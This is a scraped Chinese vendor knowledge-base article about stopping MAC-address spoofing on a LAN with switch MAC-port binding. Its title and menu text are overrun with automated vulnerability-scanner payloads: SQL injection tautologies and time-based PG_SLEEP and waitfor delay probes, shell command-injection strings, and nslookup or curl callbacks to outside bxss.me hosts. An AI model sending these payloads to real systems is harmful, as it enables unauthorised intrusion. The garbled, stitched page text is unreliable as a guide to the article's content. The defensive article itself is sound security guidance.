-1' OR 374=374 or 'mF5u9TGo'=' - 知识库文章-艾泰科技

产品中心

企业级路由器

echo vzcrma$()\ skxhiw\nz^xyu||a #' &echo vzcrma$()\ skxhiw\nz^xyu||a #|" &echo vzcrma$()\ skxhiw\nz^xyu||a #

&echo epttrz$()\ sbvgba\nz^xyu||a #' &echo epttrz$()\ sbvgba\nz^xyu||a #|" &echo epttrz$()\ sbvgba\nz^xyu||a #

lxbfYeaa&echo roixkv$()\ pqhifg\nz^xyu||a #' &echo roixkv$()\ pqhifg\nz^xyu||a #|" &echo roixkv$()\ pqhifg\nz^xyu||a #

|echo vaxfto$()\ bfpegd\nz^xyu||a #' |echo vaxfto$()\ bfpegd\nz^xyu||a #|" |echo vaxfto$()\ bfpegd\nz^xyu||a #

lxbfYeaa|echo xwnjui$()\ cfxjwx\nz^xyu||a #' |echo xwnjui$()\ cfxjwx\nz^xyu||a #|" |echo xwnjui$()\ cfxjwx\nz^xyu||a #

expr 9000750623 - 977544

(nslookup -q=cname hitxhxuagstyq35058.bxss.me||curl hitxhxuagstyq35058.bxss.me))

$(nslookup -q=cname hitspufvnrtis0220d.bxss.me||curl hitspufvnrtis0220d.bxss.me)

&nslookup -q=cname hitysfpkbnuke1e268.bxss.me&'\"`0&nslookup -q=cname hitysfpkbnuke1e268.bxss.me&`'

&(nslookup -q=cname hitriplecwmlj68c71.bxss.me||curl hitriplecwmlj68c71.bxss.me)&'\"`0&(nslookup -q=cname hitriplecwmlj68c71.bxss.me||curl hitriplecwmlj68c71.bxss.me)&`'

|(nslookup -q=cname hitqoizootwzud653e.bxss.me||curl hitqoizootwzud653e.bxss.me)

lxbfYeaa'&&sleep(27*1000)*rqcaap&&'

`(nslookup -q=cname hitmkjimoufyj09ec8.bxss.me||curl hitmkjimoufyj09ec8.bxss.me)`

;(nslookup -q=cname hitnqpjnbdxkvb0bb3.bxss.me||curl hitnqpjnbdxkvb0bb3.bxss.me)|(nslookup -q=cname hitnqpjnbdxkvb0bb3.bxss.me||curl hitnqpjnbdxkvb0bb3.bxss.me)&(nslookup -q=cname hitnqpjnbdxkvb0bb3.bxss.me||curl hitnqpjnbdxkvb0bb3.bxss.me)

lxbfYeaa"&&sleep(27*1000)*sbpckp&&"

|(nslookup${IFS}-q${IFS}cname${IFS}hitclfiuqdslv37310.bxss.me||curl${IFS}hitclfiuqdslv37310.bxss.me)

lxbfYeaa'||sleep(27*1000)*yvlczf||'

&(nslookup${IFS}-q${IFS}cname${IFS}hitljbybigsfb143fe.bxss.me||curl${IFS}hitljbybigsfb143fe.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitljbybigsfb143fe.bxss.me||curl${IFS}hitljbybigsfb143fe.bxss.me)&`'

lxbfYeaa"||sleep(27*1000)*lqcltm||"

企业级无线路由器

lxbfYeaabuRDC5lu

lxbfYeaa' AND 2*3*8=6*8 AND 'uMxp'='uMxp

lxbfYeaa" AND 2*3*8=6*8 AND "ZJo6"="ZJo6

lxbfYeaa%' AND 2*3*8=6*8 AND 'z8Cx'!='z8Cx%

lxbfYeaahYG8jINu'; waitfor delay '0:0:15' --

lxbfYeaahpo5yDZB' OR 201=(SELECT 201 FROM PG_SLEEP(15))--

lxbfYeaaIYsp9IZ5') OR 930=(SELECT 930 FROM PG_SLEEP(15))--

lxbfYeaa8SuFVq1W')) OR 630=(SELECT 630 FROM PG_SLEEP(15))--

@@U4Q9C

lxbfYeaa'"()&%

lxbfYeaa'"()&%

'"()&%

'"()&%

lxbfYeaa9884590

lxbfYeaa9438988

lxbfYeaa'"()&%

'"()&%

lxbfYeaa9932083

1FBAOSFMA3G0

xfs.bxss.me

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'"

知识库与软件

-1' OR 374=374 or 'mF5u9TGo'='

文档编号:884
浏览:8895 评分:20
最后更新于:2011-03-30

测试环境：

测试过程：

在路由器与交换机未作任何防攻击策略时，攻击电脑（IP地址为192.168.1.32）使用一款常见的攻击软件，对局域网中另一台电脑（IP地址为192.168.1.46）进行网络攻击。

图1：攻击软件演示

从受攻击电脑（IP地址为192.168.1.46）受到攻击前后的ping局域网网关192.168.1.1与ping www.baidu.com的情况可以看到：ping局域网网关不丢包（图2中的右图），延时正常；ping www.baidu.com则发生持续丢包现象（图2中的左图），被攻击电脑无法访问互联网。

图2：被攻击电脑受攻击时ping网关、百度域名情况

攻击数据分析：

通过在攻击电脑上使用抓包软件，获取到攻击数据，我们可以看到（如图3所示）：攻击电脑伪造了受攻击电脑的MAC（00:25:56:b7:2f:0b）地址向局域网中发出了大量非IP类型的数据，构成了在局域网中的伪造MAC地址欺骗。因攻击数据中不具备IP地址信息，即使通过在路由器与受攻击电脑上设置IP/MAC双向绑定也无法解决这种非ARP欺骗的问题。

图3：抓包软件获取到攻击电脑发出的攻击数据

解决方案：

局域网中使用艾泰SG 2124或SG 3124R型号的交换机，在交换机的安全日志功能里可以观察到内网某个端口存在MAC地址欺骗事件（如图4所示），可通过交换机的MAC管理功能，将攻击电脑的MAC地址与其所连交换机的端口（PORT）进行绑定，并开启该端口的端口保护功能后（如图5所示），能将攻击的数据过滤掉，使之无法进入到交换机当中，实现在局域网中防御伪造MAC地址欺骗。

图4：交换机安全日志功能

图5：交换机MAC管理功能

实施效果：

通过艾泰交换机SG 2124或SG 3124R的MAC管理功能，能轻松将内网攻击数据堵截，既能使受攻击电脑能正常上网不受影响（如图6所示），还能让攻击电脑也能正常上网只不过是过滤其发出来的攻击类型的数据。

图6：受攻击电脑由“未受攻击”—“受攻击”—“被交换机保护”的ping网关、百度域名情况

解决方案
更多成功案例

关注艾泰

微博 · 企业版
微信 · 公众平台
艾泰艾网络APP

行业解决方案

案例解析

技术与支持

服务